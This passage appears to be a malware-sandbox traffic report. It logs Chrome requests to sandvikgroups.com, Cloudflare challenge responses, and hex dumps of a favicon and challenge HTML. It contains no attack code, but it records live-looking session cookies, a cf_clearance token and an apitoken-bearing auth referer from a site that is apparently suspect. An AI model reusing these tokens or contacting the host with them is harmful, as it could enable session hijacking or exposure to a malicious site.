                                        2025-01-07 21:06:27 UTC1369INData Raw: 6c 5f 51 6b 6a 63 43 31 65 74 38 49 49 61 43 59 4b 7a 6f 4a 41 33 74 63 41 6c 76 58 61 4a 2e 77 4a 77 4e 57 31 68 64 72 72 78 34 31 5a 6d 69 4f 78 72 4a 68 6f 7a 78 45 79 64 4e 69 4d 4a 30 51 38 51 70 44 37 6c 56 72 58 70 47 58 6e 6e 4b 63 64 6d 77 6a 4d 55 33 73 58 76 4a 67 6a 6a 66 74 78 5f 2e 30 55 66 42 56 76 53 44 6e 4b 4b 4d 6e 74 4f 70 38 33 4c 35 6e 43 52 73 35 33 6a 46 64 46 48 55 4a 69 31 7a 53 37 4f 63 36 76 73 70 77 6a 6b 50 4e 46 42 61 34 32 35 77 63 7a 33 76 65 72 79 70 6c 39 70 78 54 5a 74 74 6f 4b 72 57 72 2e 68 4e 30 69 79 62 66 42 47 52 34 6a 35 34 75 58 33 4f 56 31 44 31 4b 4a 50 54 6b 32 6e 44 45 4e 71 4b 65 42 49 57 36 63 6b 5a 73 62 6f 77 59 42 49 6f 35 52 37 37 75 50 30 44 54 76 55 75 70 71 36 35 78 7a 39 78 7a 48 42 73 2e 6d 76 61
                                        Data Ascii: l_QkjcC1et8IIaCYKzoJA3tcAlvXaJ.wJwNW1hdrrx41ZmiOxrJhozxEydNiMJ0Q8QpD7lVrXpGXnnKcdmwjMU3sXvJgjjftx_.0UfBVvSDnKKMntOp83L5nCRs53jFdFHUJi1zS7Oc6vspwjkPNFBa425wcz3verypl9pxTZttoKrWr.hN0iybfBGR4j54uX3OV1D1KJPTk2nDENqKeBIW6ckZsbowYBIo5R77uP0DTvUupq65xz9xzHBs.mva
                                        2025-01-07 21:06:27 UTC1369INData Raw: 77 45 5f 4c 51 39 41 51 47 64 55 6b 50 69 76 58 4c 38 59 65 56 44 53 75 6f 51 4e 47 4e 7a 2e 53 52 43 46 31 4c 57 74 36 39 73 38 6f 7a 50 39 31 66 79 73 32 45 68 32 5a 6c 64 57 50 43 70 32 71 2e 31 6e 62 33 47 5f 47 45 64 4d 67 6a 46 78 66 36 4e 61 64 30 65 31 47 61 39 4a 78 47 75 54 63 74 33 4b 47 6c 71 44 43 53 4e 51 37 36 4a 56 66 48 6c 61 59 68 6c 6a 6c 6e 37 53 32 51 77 61 6e 39 4a 64 62 6d 6b 62 30 53 39 6e 70 30 4d 45 36 62 69 4e 42 57 4f 66 63 59 42 4f 73 43 2e 42 2e 34 69 31 62 62 50 74 4e 4a 52 4c 77 57 38 31 4d 46 4f 38 63 54 36 47 4c 53 76 5f 41 63 67 2e 74 32 59 36 56 78 48 52 34 4b 33 43 79 6f 61 73 39 36 65 54 38 4d 4f 2e 38 48 49 6d 51 70 67 4b 4e 4c 77 47 6c 4b 4e 63 6c 63 74 63 56 79 65 58 48 64 6b 4f 72 34 59 57 57 44 37 49 57 5f 39 31
                                        Data Ascii: wE_LQ9AQGdUkPivXL8YeVDSuoQNGNz.SRCF1LWt69s8ozP91fys2Eh2ZldWPCp2q.1nb3G_GEdMgjFxf6Nad0e1Ga9JxGuTct3KGlqDCSNQ76JVfHlaYhljln7S2Qwan9Jdbmkb0S9np0ME6biNBWOfcYBOsC.B.4i1bbPtNJRLwW81MFO8cT6GLSv_Acg.t2Y6VxHR4K3Cyoas96eT8MO.8HImQpgKNLwGlKNclctcVyeXHdkOr4YWWD7IW_91
                                        2025-01-07 21:06:27 UTC542INData Raw: 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 22 5c 2f 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 5c 2f 70 69 63 73 5c 2f 31 30 32 34 5f 62 67 2e 6a 70 67 26 5f 5f 63 66 5f 63 68 6c 5f 72 74 5f 74 6b 3d 55 76 36 55 2e
                                        Data Ascii: ' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null, "\/?get_link=ch_files\/pics\/1024_bg.jpg&__cf_chl_rt_tk=Uv6U.
                                        2025-01-07 21:06:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        51192.168.2.449824188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:28 UTC1883OUTGET /?get_link=ch_files/lib/pics/favi.ico HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c; cf_clearance=oHaYq7IYfWosN2nPRP.pTTLKRJAyLtN5uUZoaoiYTr4-1736283985-1.2.1.1-piz0OktFvZeLf62uywSuP3J_vhzBVwT.YudtWxBnV4hYfeskOjoMglPFCbtHf7OhboKa1K3k0QFxI4uW9abcSGgsy1VpFVpnigknqhPgfHD3mjvFO7rnx6ma530ul_r8uq.rhDCTP00hMzrqf5otLX1rvn1.8h4yffmMbPGGOaBXWvHbL_478ccyhofeYvax3EYXHDRhau3nWkI2ORvM.OM3tqbBS5Lk9Lb9zq0j6ExTorRW7WQY04gC9mzYFBTqeoLGs8CA4_mixlNlggc9n.o9SgJNZyeRTByaBc8oIU5_JGfgzAJy1cMQ.cWA_MMHu7YDH82JTqYV1Ol_MfveeGekCDuIrfofE9n2fX3etJ8PmGkDhIrDR1aDNduwnji9hXgf4DqQd992NvHKFQ0AVjEZwrWFJwqSjO6TxE_KqhXE0TU76ponUdkS2FU7MAdk
                                        2025-01-07 21:06:28 UTC1273INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:28 GMT
                                        Content-Type: image/x-icon
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, public, immutable
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        Pragma: public
                                        Pragma: no-cache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c49IWze7srcYuJx6lyP0XuSm1SoJSQOGSkg1s58FHgcYGeHWjPKHQBO%2F6%2B5mgLUBau%2F2c%2FJBavvtAfbkGsxgpGiT89iig3SK5oa%2FlpAZ%2FwhuL7BhqcUcj8fUCcj05pzZcJO7sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e96dde7a4243-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1954&rtt_var=760&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2505&delivery_rate=1414728&cwnd=193&unsent_bytes=0&cid=f14446a2c0728e9d&ts=488&x=0"
                                        2025-01-07 21:06:28 UTC96INData Raw: 33 61 65 65 0d 0a 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 46 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: 3aee h6 00 %F(
                                        2025-01-07 21:06:28 UTC1369INData Raw: 00 00 00 00 1f 1f 1f 00 0e 0e 0e 00 0e 0e 0e 00 08 0b 0e 00 5c 35 0e 57 c1 67 0e ea be 66 0e f1 bd 65 0e f1 bd 65 0e f1 c4 69 0e ef 43 28 0e 3d 2f 1e 0e 20 10 0f 0e 00 0d 0e 0e 00 0e 0e 0e 00 1b 1b 1b 00 10 10 10 00 00 00 00 00 00 00 00 00 49 23 00 59 bc 5c 00 f7 bb 5c 00 ff b9 5b 00 ff b9 5b 00 ff b9 5b 00 ff c3 60 00 ff 37 1a 00 43 66 32 00 86 6d 35 00 84 00 00 00 00 00 00 00 00 0c 0c 0c 00 10 11 12 00 00 00 00 00 54 2a 00 62 c0 5f 00 fe bc 5e 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c3 61 00 ff 37 1b 00 40 63 31 00 83 cf 67 00 ff 59 2c 00 6c 00 00 00 00 0d 0d 0e 00 10 11 12 05 60 2f 00 76 cf 67 00 ff c7 63 00 ff c4 62 00 ff c4 62 00 ff c4 62 00 ff c4 62 00 ff c4 62 00 ff cf 67 00 ff 3a 1d 00 44 60 30 00 7e c6 63 00 ff c4 62 00 ff 50 27 00
                                        Data Ascii: \5WgfeeiC(=/ I#Y\\[[[`7Cf2m5T*b_^\\\\a7@c1gY,l`/vgcbbbbbg:D`0~cbP'
                                        2025-01-07 21:06:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 18 18 00 2a 2a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 1d 00 35 bb 5d 00 e7 be 5e 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c2 61 00 ff 83 41 00 9c 00 00 00 00 22 11 00 27 c6 63 00 ff 72 39 00 75 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 1c 1c 00 2a 2a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 1e 00 3b bb 5d 00 eb be 5e 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c2 61 00 ff 83 41 00 9b 00 00 00 00 21 10 00 24 bb 5c 00 fc c8 64 00 ff 69 34 00 68 00 00 00 00
                                        Data Ascii: ***;5]^\\\\\\\\\aA"'cr9u***;;]^\\\\\\\\\\aA!$\di4h
                                        2025-01-07 21:06:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 11 00 25 ba 5c 00 f9 ba 5d 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b8 59 00 ff c1 6e 1c e3 c5 77 2a d4 b8 59 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c3 61 00 ff 3e 1f 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 11 00 25 ba 5c 00 f9 ba 5d 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b8 59 00 ff c1 6e 1c e3 c5 77 2a d5 b8 59 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c3 61 00 ff 3e 1f 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: !%\]\\\\\Ynw*Y\\\\\\a>Q!%\]\\\\\Ynw*Y\\\\\\a>Q
                                        2025-01-07 21:06:28 UTC1369INData Raw: ff c3 61 00 ff 3e 1f 00 51 00 00 00 00 68 34 00 74 cf 67 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c3 61 00 ff c2 61 00 ff c5 62 00 ff cc 66 00 ff 5a 2a 00 63 18 1a 1c 02 2b 2a 2a 00 00 00 00 00 24 12 00 18 ad 56 00 d1 c1 60 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c3 61 00 ff 3e 1f 00 51 00 00 00 00 63 31 00 6f c5 62 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bd 5e 00 ff c4 62 00 f6 56 2b 00 50 00 00 00 00 1b 1b 1c 00 2a 2a 2a 00 00 00 00 00 00 00 00 00 24 12 00 1c ad 56 00 d6 c1 60 00 ff b9 5c 00 ff b9 5c
                                        Data Ascii: a>Qh4tgaaaaaaaaaaaaaaabfZ*c+**$V`\\\a>Qc1ob\\\\\\\\\\\\\\^bV+P***$V`\\
                                        2025-01-07 21:06:28 UTC1369INData Raw: c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 c4 76 28 d7 cc 7a 28 cb 7f 53 28 4a 28 28 28 00 28 28 28 00 29 29 28 00 23 26 28 00 26 27 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 28 28 28 00 4a 4a 4a 00 44 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 10 00 10 ab 52 00 bb bd 5b 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff b7 58 00 ff bb 5a 00 ff ab 52 00 d4 0a 01 00 05 00 00 00 00 00 00 00 01 43 1e 00 35 00 00 00
                                        Data Ascii: v(v(v(v(v(v(v(v(v(z(S(J(((((())(#&(&'((((((((((((((((((((((((((((((((((JJJDDD&R[XXXXXXXXXXXXXZRC5
                                        2025-01-07 21:06:28 UTC1369INData Raw: 5c 00 ff b9 5c 00 ff b9 5c 00 ff bb 5d 00 ff b3 59 00 dd 15 0a 00 0a 00 00 00 00 00 00 00 00 87 43 00 a5 c2 60 00 ff b9 5c 00 ff b9 5c 00 ff bc 5d 00 ff c2 61 00 f6 52 29 00 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 28 28 00 48 48 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 29 00 33 c3 61 00 e5 be 5e 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bb 5d 00 ff b3 59 00 dd 15 0a 00 0a 00 00 00 00 00 00 00 00 87 43 00 a5 c2 60 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bc 5d 00 ff c2 61 00 f2 52 29 00 3e
                                        Data Ascii: \\\]YC`\\]aR)G(((HHHR)3a^\\\\\\\\\\\\\\\\\\\\]YC`\\\]aR)>
                                        2025-01-07 21:06:28 UTC1369INData Raw: 00 00 00 00 00 00 87 43 00 a5 c2 60 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff c0 5f 00 ff ab 52 00 ca 55 3f 28 16 48 48 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 87 43 00 a5 c2 60 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bb 5a 00 ff c4 76 28 b6 41
                                        Data Ascii: C`\\\\\\\\\_RU?(HHHC`\\\\\\\\\\Zv(A
                                        2025-01-07 21:06:28 UTC1369INData Raw: ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b7 58 00 ff c4 76 28 d7 cd 8a 48 b7 b7 58 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bd 5e 00 ff ac 56 00 e7 0d 07 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 87 43 00 a5 c2 60 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b7 58 00 ff c4 76 28 d7 cd 8a 48 b7 b7 58 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c
                                        Data Ascii: \\\\\\\Xv(HX\\\\\\\\\\^VC`\\\\\\\\\\Xv(HX\\\\\
                                        2025-01-07 21:06:28 UTC1369INData Raw: b9 5c 00 ff b7 58 00 ff c5 77 28 db cd 8a 48 b7 b7 58 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bd 5e 00 ff ac 56 00 e7 0d 07 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 46 00 ad ca 64 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff c1 60 00 ff bf 5c 00 ff c6 77 28 c6 cd 8a 48 b7 b7 58 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff b9 5c 00 ff bd 5e 00
                                        Data Ascii: \Xw(HX\\\\\\\\\\^VFd``````````\w(HX\\\\\\\\\\^


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        52192.168.2.449825188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:29 UTC817OUTGET /?get_link=ch_files/lib/pics/favi.ico HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:29 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:29 UTC953INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 54 69 30 6c 69 38 65 58 47 38 66 44 68 50 79 72 61 32 6d 55 4d 30 55 41 69 50 41 39 65 70 74 38 46 35 77 63 73 61 65 57 6f 5a 78 44 65 39 2f 32 59 6b 66 4e 49 6e 2b 55 6e 56 32 46 46 4a 53 76 2b 45 63 6d 6a 70 71 54 62 34 32 30 65 71 52 78 67 71 61 31 44 68 59 43 74 31 32 54 59 42 47 56 75 78 45 70 33 70 66 46 43 2f 4e 46 45 5a 44 66 70 67 32 68 44 4f 6f 55 69 6b 2b 68 2b 78 4a 6c 67 64 70 61 66 37 35 76 45 48 44 45 30 4c 2f 33 32 35 63 4e 74 67 3d 3d 24 79 6f 75 2b 67 67 4d 4b 42 2b 61 48 77 31 38 4d 75 65 68 68 37 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: Ti0li8eXG8fDhPyra2mUM0UAiPA9ept8F5wcsaeWoZxDe9/2YkfNIn+UnV2FFJSv+EcmjpqTb420eqRxgqa1DhYCt12TYBGVuxEp3pfFC/NFEZDfpg2hDOoUik+h+xJlgdpaf75vEHDE0L/325cNtg==$you+ggMKB+aHw18Muehh7w==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:29 UTC1369INData Raw: 32 32 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 2248<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
